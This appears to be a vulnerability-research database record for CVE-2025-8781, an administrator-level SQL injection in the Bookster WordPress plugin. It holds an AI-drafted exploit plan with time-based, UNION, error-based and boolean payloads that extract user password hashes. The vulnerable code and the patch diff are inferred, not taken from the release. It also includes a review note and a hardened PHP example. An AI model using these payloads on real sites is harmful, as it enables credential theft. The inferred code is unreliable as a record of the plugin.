[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHw8yCry2YNYev0vkqEFB0mtlJW1wLTSMNMNewLLYYF4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-8781","bookster-wordpress-appointment-booking-plugin-authenticated-administrator-sql-injection-via-raw","Bookster – WordPress Appointment Booking Plugin \u003C= 2.1.1 - Authenticated (Administrator+) SQL Injection via 'raw'","The Bookster – WordPress Appointment Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘raw’ parameter in all versions up to, and including, 2.1.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  
This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","bookster",null,"\u003C=2.1.1","2.2.0","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-02-17 00:00:00","2026-02-18 12:28:34",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1fc5f0ac-3323-4e6c-8900-10e13294ff9a?source=api-prod",2,[],"researched",false,3,"This plan outlines the steps to verify and exploit **CVE-2025-8781**, a SQL Injection vulnerability in the Bookster WordPress plugin.\n\n### 1. Vulnerability Summary\nThe **Bookster – WordPress Appointment Booking Plugin** (\u003C= 2.1.1) is vulnerable to SQL Injection because it processes user-supplied data via a parameter named `raw` without sufficient sanitization or the use of `wpdb->prepare()`. An attacker with Administrator privileges can inject arbitrary SQL clauses into existing database queries, potentially leading to the extraction of sensitive data from the WordPress database, including user hashes and configuration secrets.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php` (common for admin-side dashboard actions) or a specific plugin settings page.\n*   **Action (Hook):** Likely `wp_ajax_bookster_...` (requires identification in source).\n*   **Vulnerable Parameter:** `raw`.\n*   **Authentication:** Administrator-level access is required (`PR:H`).\n*   **Payload Type:** UNION-based or Error-based SQL Injection.\n\n### 3. Code Flow (Inferred)\n1.  An Administrator accesses a feature in the Bookster dashboard (e.g., Reports, Booking Logs, or Statistics).\n2.  The plugin triggers an AJAX request or a form submission that includes the `raw` parameter.\n3.  
The handler function in the plugin (e.g., `Bookster\\Admin\\Controllers\\Reports::get_data` or similar) retrieves the parameter: `$filter = $_POST['raw'];`.\n4.  The plugin constructs a SQL query by direct concatenation: \n    `$results = $wpdb->get_results(\"SELECT ... FROM ... WHERE 1=1 \" . $filter);`\n5.  The query is executed without `wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nSince this is an **authenticated (Administrator+)** vulnerability, the exploit must first authenticate as an admin and then obtain a valid nonce if the AJAX handler enforces one.\n\n**Steps for the Security Agent:**\n1.  **Login:** Authenticate as the administrator using `wp_cli` or `http_request`.\n2.  **Navigate:** Use `browser_navigate` to reach the Bookster plugin's main admin page (e.g., `\u002Fwp-admin\u002Fadmin.php?page=bookster-bookings`).\n3.  **Identify JS Variables:** Inspect the page source for `wp_localize_script` data. \n    *   Search for strings like `bookster_admin`, `bookster_params`, or `bookster_data`.\n4.  **Extract Nonce:** Use `browser_eval` to retrieve the nonce:\n    *   `browser_eval(\"window.bookster_admin?.nonce\")` (inferred variable name).\n    *   If no global variable is found, search for `_wpnonce` in the form inputs on the settings page.\n\n### 5. 
Exploitation Strategy\n\n#### Phase 1: Locate the Vulnerable Handler\nThe agent should first identify the exact action using `grep`:\n```bash\ngrep -rn \"raw\" wp-content\u002Fplugins\u002Fbookster\u002F\ngrep -rn \"\\$wpdb->get_results\" wp-content\u002Fplugins\u002Fbookster\u002F | grep \"raw\"\n```\nThis will confirm the AJAX action name (e.g., `action=bookster_get_stats`) and the name of the nonce field the handler passes to `check_ajax_referer()` (`nonce` and `security` are used as placeholders below; use whichever the source actually reads).\n\n#### Phase 2: Confirm Injection (Time-based)\nPerform a simple sleep test to confirm the parameter is vulnerable. Measure a baseline request first so the delay can be attributed to the payload rather than to server load.\n*   **Request Type:** POST to `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body:** `action=BOOKSTER_ACTION&raw= AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)&nonce=NONCE_VALUE`\n    *   The leading space is required because the inferred code appends `raw` directly after `WHERE 1=1 `; URL-encode the value (spaces, parentheses and `=`) when sending it as a form body.\n*   **Indicator:** Response delay of ~5 seconds over baseline.\n\n#### Phase 3: Data Extraction (UNION-based)\nIf the plugin reflects the results of the query in the response:\n1.  **Find Column Count:** Inject `ORDER BY 1-- -`, `ORDER BY 2-- -`, etc., until an error occurs (or, where database errors are not shown, until the response changes or becomes empty). The number of columns in the `UNION SELECT` below must match that count; six is illustrative.\n2.  **Payload:** \n    `raw= AND 1=0 UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -`\n3.  **Request Parameters (example):** `admin-ajax.php` reads `$_POST`, so send these as `application\u002Fx-www-form-urlencoded` fields; they are shown as key\u002Fvalue pairs only for readability, not as a JSON body.\n```json\n{\n    \"action\": \"bookster_get_stats\",\n    \"raw\": \" AND 1=0 UNION SELECT 1,user_login,user_pass,NULL,NULL,NULL FROM wp_users WHERE ID=1-- -\",\n    \"security\": \"NONCE_FROM_JS\"\n}\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install bookster --version=2.1.1 --activate`\n2.  **Create Content:** Ensure there is at least one booking or entry in the plugin's tables so that the base query returns results.\n    *   Navigate to the Bookster settings and create a test service\u002Fbooking.\n3.  **Identify Table Prefix:** Note the database prefix (usually `wp_`); the `wp_users` references in the payloads assume the default prefix.\n\n### 7. Expected Results\n*   **Time-based:** The HTTP response time will be significantly higher than the baseline when the `SLEEP()` payload is provided.\n*   **UNION-based:** The response body (likely JSON) will contain the administrator's username and hashed password instead of the expected booking data.\n\n### 8. 
Verification Steps\nAfter the exploit, verify the extracted data matches the database state via `wp_cli`:\n```bash\n# Compare extracted hash with actual hash\nwp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"\n```\n\n### 9. Alternative Approaches\n*   **Error-based:** If the plugin displays database errors (common in dev environments), use `extractvalue()` or `updatexml()` payloads:\n    *   `raw= AND extractvalue(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e))`\n    *   MySQL truncates the XPATH error text to 32 characters, so a full hash must be read in `SUBSTRING()` chunks across several requests.\n*   **Boolean-based:** If no output is reflected and time-based is unstable, use boolean checks:\n    *   `raw= AND (SELECT SUBSTRING(user_pass,1,3) FROM wp_users WHERE ID=1)='$P$'`\n    *   The substring length must match the compared literal (`$P$` is three characters; a one-character `SUBSTRING(user_pass,1,1)` could never equal it). `$P$` is the phpass prefix; WordPress 6.8 and later store bcrypt hashes prefixed `$wp$`, so test for that prefix on current installs.\n    *   Compare response content\u002Flength for `TRUE` vs `FALSE` conditions.\n\n### 10. Grep Patterns for Discovery (Pre-Exploit)\n```bash\n# Find where 'raw' is retrieved from input\ngrep -rP \"\\['raw'\\]|\\[\\\"raw\\\"\\]\" wp-content\u002Fplugins\u002Fbookster\u002F\n\n# Find where 'raw' is used in a query (single quotes keep the backslashes, so\n# \\$ matches a literal $ instead of acting as the PCRE end-of-line anchor)\ngrep -rP '\\$wpdb->.*\\. \\$' wp-content\u002Fplugins\u002Fbookster\u002F | grep \"raw\"\n\n# Find AJAX action registrations\ngrep -rn \"wp_ajax_bookster\" wp-content\u002Fplugins\u002Fbookster\u002F\n```","The Bookster plugin for WordPress is vulnerable to SQL Injection via the 'raw' parameter in versions up to and including 2.1.1. This occurs because the plugin concatenates user-supplied input directly into a SQL query without sanitization or `$wpdb->prepare()`. Authenticated administrators can exploit this to inject arbitrary clauses into the existing SELECT statement (`$wpdb` issues a single statement, so stacked queries are not available) and extract sensitive database information, including user credentials.","\u002F\u002F Inferred from research plan and vulnerability description\n\u002F\u002F Path likely: wp-content\u002Fplugins\u002Fbookster\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n\n$filter = $_POST['raw'];\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 \" . 
$filter);","--- a\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n+++ b\u002Fincludes\u002Fadmin\u002Fclass-bookster-reports.php\n@@ -10,3 +10,2 @@\n-if (isset($_POST['raw'])) {\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 \" . $_POST['raw']);\n-}\n+\u002F\u002F Removed the 'raw' parameter which allowed arbitrary SQL concatenation.\n+\u002F\u002F Use specific, sanitized filters with wpdb->prepare().\n+$results = $wpdb->get_results($wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 AND status = %s\", $_POST['status']));","1. Log in to the WordPress admin panel with Administrator-level privileges.\n2. Navigate to the Bookster plugin's reports or bookings page to find the AJAX action (e.g., 'bookster_get_stats' or similar).\n3. Extract the security nonce from the page source or localized JavaScript variables (e.g., 'bookster_admin.nonce').\n4. Submit a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' and a malicious SQL payload in the 'raw' parameter.\n5. Confirm the vulnerability using a time-based payload like ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)', which will cause the server to delay its response.\n6. 
Exfiltrate sensitive data (e.g., user hashes) using a UNION-based payload: ' AND 1=0 UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -'.","gemini-3-flash-preview","2026-04-20 21:18:26","2026-04-20 21:20:11",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbookster.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags\u002F2.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbookster.2.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbookster\u002Ftags"]
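Review bot: in the inferred hunk for includes/admin/class-bookster-reports.php the header `@@ -10,3 +10,2 @@` does not match the body, which removes three lines and adds three (two comment lines plus the `$wpdb->prepare()` call), so it should read `@@ -10,3 +10,3 @@` or the patch will not apply. Separately, the replacement still reads `$_POST['status']` with no `check_ajax_referer()` or `current_user_can()` guard in view; the `%s` placeholder in `prepare()` stops the injection, but the handler should also verify the nonce and capability and constrain `status` to the plugin's known values. Since `patch_diff_files` is empty and the vulnerable-code field is marked inferred, the diff should say it is reconstructed from the advisory rather than taken from the 2.2.0 release.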
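The handler pattern the research plan infers, beside a hardened replacement, as an added example that is not Bookster's code and is not taken from the 2.2.0 release. The action name `bookster_get_stats`, the nonce action `bookster_admin`, the table `{$wpdb->prefix}bookster_bookings` and its column names are assumptions carried over from or added to the inferred plan; the hardened function shows the shape a fix needs once a free-form `raw` clause is removed.

```php
<?php
// Added example, not Bookster's code. Action name, nonce action, table name and
// column names are assumptions for illustration only.

// --- Vulnerable pattern, as described in the research plan (hook left unregistered) ---
// add_action( 'wp_ajax_bookster_get_stats', 'bookster_get_stats_vulnerable' );
function bookster_get_stats_vulnerable() {
    global $wpdb;
    // Whatever the caller sends in 'raw' becomes SQL text, so a value such as
    // " AND 1=0 UNION SELECT ..." rewrites the statement.
    $filter  = $_POST['raw'];
    $results = $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE 1=1 " . $filter );
    wp_send_json_success( $results );
}

// --- Hardened version ---
add_action( 'wp_ajax_bookster_get_stats', 'bookster_get_stats_hardened' );
function bookster_get_stats_hardened() {
    global $wpdb;

    // 1. Nonce and capability: admin-only endpoint, not reachable by CSRF relay.
    check_ajax_referer( 'bookster_admin', 'nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Replace the free-form clause with a fixed filter vocabulary. Each key
    //    maps to a column and a prepare() placeholder, so callers choose values
    //    and never SQL text. (Column names are assumed.)
    $allowed = array(
        'status'     => array( 'column' => 'status',     'fmt' => '%s' ),
        'service_id' => array( 'column' => 'service_id', 'fmt' => '%d' ),
        'date_from'  => array( 'column' => 'start_date', 'fmt' => '%s', 'op' => '>=' ),
        'date_to'    => array( 'column' => 'start_date', 'fmt' => '%s', 'op' => '<=' ),
    );

    $where = array( '1=1' );
    $args  = array();
    foreach ( $allowed as $key => $spec ) {
        if ( ! isset( $_POST[ $key ] ) || '' === $_POST[ $key ] ) {
            continue;
        }
        $op      = isset( $spec['op'] ) ? $spec['op'] : '=';
        $where[] = "{$spec['column']} {$op} {$spec['fmt']}";
        // Values are normalised before prepare(): %d is cast to int, %s is
        // quoted and escaped by prepare() itself.
        $args[]  = ( '%d' === $spec['fmt'] )
            ? absint( wp_unslash( $_POST[ $key ] ) )
            : sanitize_text_field( wp_unslash( $_POST[ $key ] ) );
    }

    // 3. ORDER BY cannot be a placeholder, so it comes from an allowlist; LIMIT
    //    is an integer placeholder with an upper bound.
    $order_by = ( isset( $_POST['order_by'] )
        && in_array( $_POST['order_by'], array( 'start_date', 'status' ), true ) )
        ? $_POST['order_by'] : 'start_date';
    $limit    = isset( $_POST['limit'] ) ? min( 500, absint( $_POST['limit'] ) ) : 100;

    $sql = "SELECT * FROM {$wpdb->prefix}bookster_bookings WHERE " . implode( ' AND ', $where )
         . " ORDER BY {$order_by} DESC LIMIT %d";
    $args[] = $limit;

    // prepare() accepts the argument list as a single array.
    $results = $wpdb->get_results( $wpdb->prepare( $sql, $args ) );
    wp_send_json_success( $results );
}
```

The allowlist map is the substantive change, not `prepare()` on its own: the original design needs caller-supplied SQL text spliced in verbatim, which is exactly the bug, and placeholders can only carry values. Identifiers such as the `ORDER BY` column therefore have to be checked with `in_array()` in code, and only the values go through `prepare()`.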